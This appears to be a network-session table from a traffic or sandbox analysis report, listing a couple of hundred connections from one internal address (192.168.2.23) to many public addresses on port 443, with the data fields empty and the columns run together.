                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29656192.168.2.2346314152.75.61.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29657192.168.2.2334538119.96.7.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29658192.168.2.2332878172.32.249.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29659192.168.2.2338780158.31.107.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29660192.168.2.2339688138.114.171.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29661192.168.2.23520288.232.145.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29662192.168.2.2350940111.248.200.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29663192.168.2.2341712217.200.167.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29664192.168.2.235108458.48.53.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29665192.168.2.234252280.58.210.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29666192.168.2.234570659.168.199.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29667192.168.2.2353234121.179.108.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29668192.168.2.234804688.239.223.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29669192.168.2.235586887.234.185.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29670192.168.2.2355236181.195.69.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29671192.168.2.235371899.180.50.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29672192.168.2.235967031.155.22.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29673192.168.2.236072275.133.137.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29674192.168.2.234336218.119.85.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29675192.168.2.235823224.31.57.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29676192.168.2.2334892203.114.79.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29677192.168.2.233606698.221.126.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29678192.168.2.2338308192.25.176.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29679192.168.2.2352848172.179.30.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29680192.168.2.2346544105.253.204.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29681192.168.2.2352226147.190.59.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29682192.168.2.2333896166.112.149.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29683192.168.2.234124646.27.40.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29684192.168.2.23355582.199.92.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29685192.168.2.235610463.116.75.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29686192.168.2.2353928112.149.165.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29687192.168.2.2339298199.102.148.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29688192.168.2.2360250179.232.224.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29689192.168.2.2360920200.175.86.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29690192.168.2.2337546162.19.81.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29691192.168.2.2349952221.192.23.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29692192.168.2.234617879.226.80.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29693192.168.2.234255636.35.183.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29694192.168.2.235498666.232.94.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29695192.168.2.2341888145.136.181.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29696192.168.2.235002092.238.46.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29697192.168.2.235365658.134.212.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29698192.168.2.235845238.26.20.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29699192.168.2.2345672184.178.59.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29700192.168.2.2335898182.31.126.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29701192.168.2.2334718202.31.184.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29702192.168.2.2349948138.99.74.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29703192.168.2.233412488.185.3.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29704192.168.2.233731817.168.37.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29705192.168.2.2335698175.223.223.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29706192.168.2.2337482105.154.0.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29707192.168.2.2334698130.228.154.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29708192.168.2.2358902122.241.172.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29709192.168.2.2351312135.158.96.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29710192.168.2.235669217.55.255.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29711192.168.2.233358658.25.213.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29712192.168.2.233421058.88.212.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29713192.168.2.235459671.48.145.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29714192.168.2.2342528105.249.178.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29715192.168.2.2336356153.157.227.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29716192.168.2.233742878.217.88.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29717192.168.2.2343334125.141.159.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29718192.168.2.233402499.115.135.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29719192.168.2.233601631.44.114.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29720192.168.2.235990835.74.114.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29721192.168.2.2335616196.117.194.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29722192.168.2.2353704208.82.133.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29723192.168.2.2348482109.26.10.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29724192.168.2.2347664176.32.187.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29725192.168.2.2359828204.163.117.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29726192.168.2.2349614101.160.248.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29727192.168.2.2345268104.200.62.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29728192.168.2.2344844216.184.178.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29729192.168.2.2358606185.124.111.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29730192.168.2.2355296200.197.185.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29731192.168.2.2348392187.166.255.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29732192.168.2.2333896193.16.240.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29733192.168.2.2333318183.17.94.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29734192.168.2.234859872.120.202.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29735192.168.2.2341910162.157.98.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29736192.168.2.235035444.143.73.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29737192.168.2.23470365.143.226.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29738192.168.2.235042819.192.190.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29739192.168.2.2355214149.75.69.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29740192.168.2.2342226219.129.88.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29741192.168.2.233453254.232.35.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29742192.168.2.235473074.102.128.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29743192.168.2.236040250.68.138.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29744192.168.2.235021618.151.184.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29745192.168.2.2350966158.151.11.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29746192.168.2.2358110220.62.215.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29747192.168.2.2355236176.5.141.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29748192.168.2.2341288161.194.108.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29749192.168.2.233770485.187.253.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29750192.168.2.2352154144.241.96.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29751192.168.2.2343834202.29.243.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29752192.168.2.2345556160.87.59.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29753192.168.2.2356992163.73.27.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29754192.168.2.2332892192.157.119.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29755192.168.2.235706650.74.107.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29756192.168.2.2342430141.131.41.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29757192.168.2.2353324145.73.202.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29758192.168.2.2338410192.35.233.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29759192.168.2.235996246.161.98.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29760192.168.2.2333490212.222.121.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29761192.168.2.235181273.93.131.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29762192.168.2.2352622108.126.25.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29763192.168.2.235780672.165.39.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29764192.168.2.2337498164.242.106.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29765192.168.2.2335258190.229.170.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29766192.168.2.2350440219.16.61.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29767192.168.2.234230225.171.156.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29768192.168.2.235717067.50.27.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29769192.168.2.234131643.143.63.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29770192.168.2.233339080.35.91.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29771192.168.2.2346874166.212.129.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29772192.168.2.2345636166.2.187.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29773192.168.2.2341310124.148.52.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29774192.168.2.2336184218.14.167.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29775192.168.2.2355724164.87.175.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29776192.168.2.233981227.180.80.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29777192.168.2.2358232175.73.142.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29778192.168.2.233423627.224.168.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29779192.168.2.2355100187.152.81.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29780192.168.2.233372285.242.58.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29781192.168.2.235849283.63.166.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29782192.168.2.234540080.122.58.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29783192.168.2.2348226153.103.125.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29784192.168.2.2347806130.146.100.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29785192.168.2.23481729.125.148.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29786192.168.2.2354374194.118.106.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29787192.168.2.2353128143.144.14.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29788192.168.2.2359938125.26.115.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29789192.168.2.2340688177.87.159.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29790192.168.2.2334054211.53.158.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29791192.168.2.2342148195.250.191.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29792192.168.2.2337696122.85.75.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29793192.168.2.235511413.74.251.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29794192.168.2.2345108195.220.174.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29795192.168.2.234228445.233.254.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29796192.168.2.2338176142.191.240.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29797192.168.2.2334636120.154.40.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29798192.168.2.2337226161.250.92.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29799192.168.2.235892891.44.180.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29800192.168.2.2340770145.73.158.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29801192.168.2.2333494103.67.16.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29802192.168.2.234410850.13.17.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29803192.168.2.2360422157.32.232.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29804192.168.2.2341742189.126.177.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29805192.168.2.233646412.222.82.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29806192.168.2.2360390141.227.162.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29807192.168.2.2336574161.38.127.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29808192.168.2.235353279.19.187.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29809192.168.2.2353268146.145.51.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29810192.168.2.234117217.91.21.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29811192.168.2.2346844221.225.139.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29812192.168.2.2337042121.211.99.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29813192.168.2.235263827.136.127.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29814192.168.2.235696470.47.182.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29815192.168.2.234298695.95.71.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29816192.168.2.2357014129.148.179.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29817192.168.2.235897874.82.197.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29818192.168.2.234046480.15.158.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29819192.168.2.233389817.8.170.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29820192.168.2.233453460.47.153.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29821192.168.2.2337518131.112.226.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29822192.168.2.2342070174.239.46.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29823192.168.2.2336582207.17.240.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29824192.168.2.2344658108.175.109.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29825192.168.2.2339304166.224.1.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29826192.168.2.2346532197.77.117.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29827192.168.2.2343600209.34.41.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29828192.168.2.2334252128.77.209.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29829192.168.2.2352712104.197.211.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29830192.168.2.233488885.138.104.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29831192.168.2.233383060.230.50.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29832192.168.2.2346412145.171.195.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29833192.168.2.234777250.195.218.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29834192.168.2.2354526156.107.109.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29835192.168.2.2353666174.83.159.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29836192.168.2.2355968219.55.159.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29837192.168.2.2344598108.89.226.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29838192.168.2.235976291.220.99.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29839192.168.2.233590696.41.3.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29840192.168.2.2355114162.60.161.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29841192.168.2.2360630176.93.95.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29842192.168.2.2352886110.57.230.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29843192.168.2.2354306195.155.95.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29844192.168.2.235180461.246.60.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29845192.168.2.2338314218.54.38.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29846192.168.2.233370419.127.124.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29847192.168.2.233512846.151.178.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29848192.168.2.2350160130.173.238.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29849192.168.2.2345144199.98.195.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29850192.168.2.234971217.181.220.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29851192.168.2.2355010212.15.5.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29852192.168.2.235778871.132.153.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29853192.168.2.2334960152.192.255.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29854192.168.2.2354352105.162.44.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29855192.168.2.2344648157.247.120.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29856192.168.2.2347324116.125.252.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29857192.168.2.2359936178.230.16.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29858192.168.2.2357544163.218.51.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29859192.168.2.2344262204.183.53.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29860192.168.2.2340678121.187.123.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29861192.168.2.23429448.63.216.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29862192.168.2.235828463.60.121.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29863192.168.2.235866469.51.117.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29864192.168.2.2345220158.210.132.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29865192.168.2.2339094181.47.235.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29866192.168.2.233881092.167.239.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29867192.168.2.2343352129.93.69.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29868192.168.2.2357712177.44.231.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29869192.168.2.2342126133.64.75.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29870192.168.2.234218418.116.193.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29871192.168.2.2336070102.152.219.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29872192.168.2.2351214203.227.139.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29873192.168.2.2356898148.80.217.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29874192.168.2.235100677.131.61.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29875192.168.2.2354998142.225.242.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29876192.168.2.2336184121.47.39.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29877192.168.2.235153885.46.124.8443
